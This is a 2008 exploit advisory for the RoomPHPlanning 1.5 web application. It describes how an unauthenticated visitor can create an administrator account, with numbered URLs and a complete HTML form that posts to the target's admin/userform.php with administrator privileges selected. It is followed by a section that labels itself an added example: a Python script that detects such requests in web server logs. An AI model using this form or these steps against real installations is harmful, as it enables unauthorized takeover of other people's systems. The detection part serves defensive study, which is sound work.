RoomPHPlanning 1.5 Arbitrary Add Admin User Vulnerability
Source: www.vfcocus.net  Author: Stack  Published: 2008-05-27
###########################################
{+} RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability
{+} Script download : http://www.beaussier.com/roomphplanning/telecharge.php
{+} Found by : Stack
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
DESCRIPTION:
RoomPHPlanning lets a remote visitor add a user by going to the link below.
In the Nom field write any name, in the Login email field write your email address, then a password,
set the Privilèges field to Administrateur, and click [Enregistrer].
Vulnerability:
  Go to this link to add an admin user:
1 : http://localhost/path/admin/userform.php
  Go to this link to log in:
2 : http://localhost/path/login.php
  After logging in, go to the admin link:
3 : http://localhost/path/admin/
  To see all administrators and edit them:
4 : http://localhost/path/admin/?user=1
After you submit the add-user form or log in, the page does not change;
you have to go to the next link yourself, in the order 1, 2, 3, 4.

EXPLOIT HTML :
-------------------------------------------------------------------------------------
<HTML>
<HEAD>
<TITLE>RoomPHPlanning add Admin user</TITLE>
<LINK REL="stylesheet" TYPE="text/css" HREF="style.css">
</HEAD>
<BODY>
<!-- Form posting to the application's admin/userform.php -->
<FORM ACTION="http://site.com/path/admin/userform.php" METHOD="POST">
<INPUT TYPE="HIDDEN" NAME="save" VALUE="1">
<TABLE WIDTH=98% BORDER=0 CELLPADDING=4 CELLSPACING=0>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Nom</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='name' SIZE=40 VALUE=""></TD>
</TR>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Login email</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='login' SIZE=40 VALUE=""></TD>
</TR>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Mot de passe</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='pwd' SIZE=20></TD>
</TR>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Privilèges</P></TD><TD WIDTH=50%><SELECT NAME="rank">
<OPTION VALUE="1">Administrateur</OPTION>
<OPTION VALUE="2">Utilisateur de base</OPTION>
<OPTION VALUE="3">Utilisateur normal</OPTION>
<OPTION VALUE="4">Anonyme</OPTION>
<OPTION VALUE="5">Super utilisateur</OPTION>
<OPTION VALUE="6">Gestionnaire</OPTION>
</SELECT>
</TD>
</TR><TR><TD COLSPAN=2 WIDTH=100% VALIGN=TOP><CENTER><BR>
<INPUT TYPE="SUBMIT" VALUE="Enregistrer">
<INPUT TYPE="BUTTON" VALUE="Annuler"  ONCLICK="javascript:window.close();">
</CENTER></TD></TR></TABLE></FORM></BODY>
</HTML>
-------------------------------------------------------------------------------------
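
A detection sketch for the sequence above (added example, not part of the original advisory): it scans Apache combined-format access log lines for POSTs to `admin/userform.php` from a client that has not previously POSTed to `login.php`, or whose Referer is missing or off-site, as it would be for a form hosted elsewhere. The log format, the host name `intranet.example` and the sample lines are assumptions constructed for illustration; a POST to `login.php` is treated as a login attempt, not proof of success.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" format: ip, ident, user, [time], "request", status, size, "referer", "agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def find_suspect_user_adds(lines, site_host):
    """Return (ip, timestamp, reasons) for each suspicious POST to admin/userform.php."""
    logged_in = set()  # client IPs that have already POSTed to login.php
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = urlsplit(m["path"]).path
        if path.endswith("/login.php"):
            logged_in.add(m["ip"])
        elif path.endswith("/admin/userform.php"):
            reasons = []
            if m["ip"] not in logged_in:
                reasons.append("no prior login")
            # A "-" or foreign Referer means the form was not served by the site itself.
            if urlsplit(m["referer"]).hostname != site_host:
                reasons.append("off-site or missing referer")
            if reasons:
                findings.append((m["ip"], m["ts"], reasons))
    return findings

# Constructed sample log lines (documentation IP ranges, hypothetical host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2008:10:00:01 +0000] "POST /path/login.php HTTP/1.1" '
    '302 - "http://intranet.example/path/login.php" "Mozilla/5.0"',
    '192.0.2.10 - - [27/May/2008:10:02:15 +0000] "POST /path/admin/userform.php HTTP/1.1" '
    '200 512 "http://intranet.example/path/admin/?user=1" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2008:11:30:44 +0000] "POST /path/admin/userform.php HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, reasons in find_suspect_user_adds(SAMPLE_LOG, "intranet.example"):
        print(f"{ts} {ip}: {', '.join(reasons)}")
```

Matching on client IP is a heuristic; where the application logs session identifiers, keying on those gives fewer false positives behind NAT or proxies.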

GREETZ: http://real-hack.com
-----------------------------------------------------------------------------

 